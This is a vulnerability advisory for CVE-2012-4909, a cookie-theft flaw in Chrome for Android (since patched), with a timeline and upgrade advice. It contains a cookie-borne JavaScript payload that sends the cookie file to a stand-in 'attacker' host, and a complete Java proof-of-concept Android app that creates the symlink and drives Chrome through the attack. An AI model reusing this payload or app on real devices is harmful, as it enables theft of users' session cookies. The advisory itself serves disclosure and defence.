Chrome For Android Cookie Theft

2013.01.08
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

CVE Number: CVE-2012-4909 Title: Chrome for Android - Cookie theft from Chrome by malicious Android app Affected Software: Confirmed on Chrome for Android v18.0.1025123 Credit: Takeshi Terada Issue Status: v18.0.1025308 was released which fixes this vulnerability Overview: Symbolic links can be used for spoofing Content-Type of local files. It enables malicious Android apps to steal Chrome's Cookie file. Details: When a local URI (file:///) of symlink is given to Chrome for Android (v18.0.1025123), Chrome resolves symlink and load the content of the file that the symlink is pointing to. At the time of loading, Chrome does MIME sniffing by the extension of the symlink, rather than that of the actual file which symlink is pointing to. This behavior can be used for deluding Chrome into thinking that the Chrome's private file (Cookie file) is HTML. When Chrome renders the Cookie file as HTML, JavaScript in the Cookie file is executed. Whole steps to steal Chrome's Cookie file are described below: 1. A malicious app create a symlink pointing to Chrome's Cookie file. The extension of the symlink should be "html", which is a simple trick for spoofing Content-Type. 2. The malicious app forces Chrome to load attacker's Web page. The Web page sets a crafted Cookie which contains malicious HTML+JavaScript to steal the whole content of the Cookie file: Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?' +encodeURIComponent(document.body.innerHTML)</script>; expires=Tue, 01-Jan-2030 00:00:00 GMT The Cookie is stored in the Cookie file of Chrome. 3. The malicious app makes Chrome load the local URI of the symlink. Then Chrome follows the symlink and renders the Cookie file as HTML, because the extension of the URI (symlink) is "html". It results in the execution of the attacker's JavaScript code that is injected in the Cookie file. Attacker-supplied JavaScript read the whole content of the Cookie file and send it to the attacker's server. Proof of Concept: package jp.mbsd.terada.attackchrome1; import android.app.Activity; import android.os.Bundle; import android.util.Log; import android.content.Intent; import android.net.Uri; public class Main extends Activity { // TAG for logging. public final static String TAG = "attackchrome1"; // Cookie file path of Chrome. public final static String CHROME_COOKIE_FILE_PATH = "/data/data/com.android.chrome/app_chrome/Default/Cookies"; // Temporaly directory in which the symlink will be created. public final static String MY_TMP_DIR = "/data/data/jp.mbsd.terada.attackchrome1/tmp/"; // The path of the Symlink (must have "html" extension) public final static String LINK_PATH = MY_TMP_DIR + "cookie.html"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); doit(); } // Method to invoke Chrome. public void invokeChrome(String url) { Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse(url)); startActivity(intent); } // Method to execute OS command. public void cmdexec(String[] cmd) { try { Runtime.getRuntime().exec(cmd); } catch (Exception e) { Log.e(TAG, e.getMessage()); } } // Main method. public void doit() { try { // Create the symlink in this app's temporary directory. // The symlink points to Chrome's Cookie file. cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR}); cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH}); cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR}); Thread.sleep(1000); // Force Chrome to load attacker's web page to poison Chrome's Cookie file. // Suppose the web page sets a Cookie as below. // x=<img><script>document.images[0].src='http://attacker/?' // +encodeURIComponent(document.body.innerHTML)</script>; // expires=Tue, 01-Jan-2030 00:00:00 GMT String url1 = "http://attacker/set_malicious_cookie.php"; invokeChrome(url1); Thread.sleep(10000); // Force Chrome to load the symlink. // Chrome renders the content of the Cookie file as HTML. String url2 = "file://" + LINK_PATH; invokeChrome(url2); } catch (Exception e) { Log.e(TAG, e.getMessage()); } } } Timeline: 2012/08/06 Reported to Google security team 2012/09/12 Vender announced v18.0.1025308 2013/01/07 Disclosure of this advisory Recommendation: Upgrade to the latest version. Reference: http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html https://code.google.com/p/chromium/issues/detail?id=141889

References:

http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=141889


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top